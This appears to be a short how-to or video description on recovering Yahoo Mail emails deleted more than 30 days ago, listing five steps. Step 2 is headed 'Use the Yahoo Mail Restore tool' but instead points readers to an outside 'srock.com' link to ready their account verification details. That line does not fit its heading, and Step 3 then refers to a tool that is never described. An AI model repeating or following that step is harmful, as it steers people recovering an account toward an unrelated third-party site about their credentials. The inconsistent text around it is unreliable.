If you've accidentally deleted emails from your Yahoo Mail account and it's been more than 30 days, recovering them can be challenging. However, there are still steps you can take to try to retrieve those lost messages. Step 1. Check the trash folder. Log into your Yahoo Mail account and navigate to the trash folder. Emails are typically stored here for 30 days after deletion. If you find your email, you can restore it by selecting it and moving it back to your inbox. Step 2. Use the Yahoo Mail Restore tool. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Contact Yahoo support. If the restore tool does not work, reach out to Yahoo support. Explain your situation and provide any relevant details about the emails you are trying to recover. They may have additional options or advice for you. Step 4. Check other devices. If you access your Yahoo Mail from multiple devices, check those devices for any synced emails. Sometimes, emails may still be available on a phone or tablet even if they are deleted from the web version. Step 5. Regular backups. For future prevention, consider regularly backing up your emails. You can do this by exporting your emails or using third-party backup services. This way, you can avoid losing important messages in the future. In conclusion, while recovering deleted emails after 30 days can be difficult, following these steps may help you retrieve important information. Always remember to back up your emails regularly to prevent future losses.